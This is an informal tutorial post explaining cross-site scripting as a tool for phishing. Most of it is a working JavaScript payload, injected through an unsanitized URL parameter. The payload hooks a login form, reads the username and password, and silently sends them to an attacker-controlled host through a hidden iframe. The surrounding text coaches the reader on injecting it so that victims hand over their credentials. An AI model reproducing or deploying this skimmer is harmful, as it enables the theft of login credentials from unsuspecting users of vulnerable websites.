What is cross site scripting XSS

XSS are certainly changing the away that Phishing attacks are perpetrated.

This video is controversial by Brial Contos, CISSP from a company named IMPERVA. it takes through each and every step involved to find a xss vulnerability in a webpage . and showcases some of the basic steps that you need to know.

for example we have a target as :-
http://Thewebsite.com/google/add.php?request=

Suppose, there is a login form and a XSS vulnerability in the 
same page. 
In order to perpetrate the phishing attack one need to inject JavaScript code in the 
variable to make that the victim’s browser load a JavaScript file. 
From a brief analyses at the HTML that the site generates I know that :

• The value that the variable “request” receives is not sanitized at all.

• The login form is named “login_clientes”

• The login form have two input fields for user data: “user” and “pass”.

So I will use the following JavaScript code:

loginForm = document.forms['login_clientes']; 
function parseData() 
{ 
var username = loginForm.user.value; 
var password = loginForm.pass.value; 
saveData(username,password); 
return true; 
} 
function saveData(username,password) 
{ 
var frame=document.createElement('iframe'); 
frame.src="http://myhost/myparsefile.php?username=" + username + "&password=" + 
password; 
frame.style.display='none'; 
document.body.appendChild(frame); 
} 
loginForm.onsubmit = parseData;

So, if browsing a page like (don’t forget to encode the part of the injection):
http://Thewebsite.com/google/add.php?request= 
A victim will give you his personal data, as long as he clicks the Submit button. 

The ideas that you must have in mind are:

• If you can make the user browser load your JavaScript file or code when visiting 
some site, you can change that site behavior.

• If some site has forms and XSS vulnerabilities you can try to get the user 
inputted data.

• If the user trust the site, the user will, probably, give his personal data 
anywhere in that site.

And if the site has vulnerabilities in some page where it doesn’t have forms, and have 
some form(s) in other page(s).